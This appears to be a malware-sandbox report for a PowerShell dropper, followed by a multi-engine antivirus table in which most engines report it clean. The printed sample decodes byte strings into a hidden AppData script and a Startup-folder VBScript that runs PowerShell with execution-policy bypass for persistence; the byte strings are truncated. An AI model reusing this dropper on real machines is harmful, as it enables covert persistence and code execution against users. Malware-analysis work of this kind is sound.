Static | ZeroBOX
No static analysis available.
$byteString = "102,117,110,99,116,105,111,110,32,70,122,78,75,114,83,113,103,118,78,102,88,32,123,13,10,32,32,32,32,112,97,114,97,109,32,40,13,10,32,32,32,32,32,32,32,32,91,98,121,116,101,91,93,93,36,99,67,104,90,103,66,119,89,78,106,117,98,44,13,10,32,32,32,32,32,32,32,32,91,98,121,116,101,91,93,93,36,115,90,114,82,77,70,108,110,73,72,80,87,44,13,10,32,32,32,32,32,32,32,32,91,98,121,116,101,91,93,93,36,66,88,118,121,83,112,101,120,116,116,79,66,13,10,32,32,32,32,41,13,10,13,10,32,32,32,32,36,119,78,72,66,120,76,89,119,122,74,111,122,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,83,101,99,117,114,105,116,121,46,67,114,121,112,116,111,103,114,97,112,104,121,46,65,101,115,67,114,121,112,116,111,83,101,114,118,105,99,101,80,114,111,118,105,100,101,114,13,10,32,32,32,32,36,119,78,72,66,120,76,89,119,122,74,111,122,46,77,111,100,101,32,61,32,91,83,121,115,116,101,109,46,83,101,99,117,114,105,116,121,46,67,114,121,112,116,111,103,114,97,112,104,121,46,67,105,112,104,101,114,77,111,100,101
$filePath = "c:\users\$env:username\AppData\Roaming\AnyClesk.ps1"
$bytes = $byteString -split ',' | ForEach-Object { [byte]$_ }
[IO.File]::WriteAllBytes($filePath, $bytes)
$VbsbyteString = "9,13,10,83,101,116,32,111,98,106,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,13,10,115,116,114,85,115,101,114,110,97,109,101,32,61,32,111,98,106,83,104,101,108,108,46,69,120,112,97,110,100,69,110,118,105,114,111,110,109,101,110,116,83,116,114,105,110,103,115,40,34,37,85,83,69,82,78,65,77,69,37,34,41,13,10,13,10,115,116,114,65,112,112,68,97,116,97,32,61,32,111,98,106,83,104,101,108,108,46,69,120,112,97,110,100,69,110,118,105,114,111,110,109,101,110,116,83,116,114,105,110,103,115,40,34,37,65,80,80,68,65,84,65,37,34,41,13,10,13,10,115,116,114,80,111,119,101,114,83,104,101,108,108,83,99,114,105,112,116,32,61,32,115,116,114,65,112,112,68,97,116,97,32,38,32,34,92,65,110,121,67,108,101,115,107,46,112,115,49,34,13,10,13,10,115,116,114,67,111,109,109,97,110,100,32,61,32,34,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,1
$VbsfilePath = "c:\users\$env:username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AnyClesk.vbs"
$Vbsbytes = $VbsbyteString -split ',' | ForEach-Object { [byte]$_ }
[IO.File]::WriteAllBytes($VbsfilePath, $Vbsbytes)
Start-Process -filepath $VbsfilePath
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Win32-PS.Save.WScriptShell
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
FireEye Clean
Emsisoft Clean
GData Clean
Jiangmin Clean
Varist Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Other:Malware-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.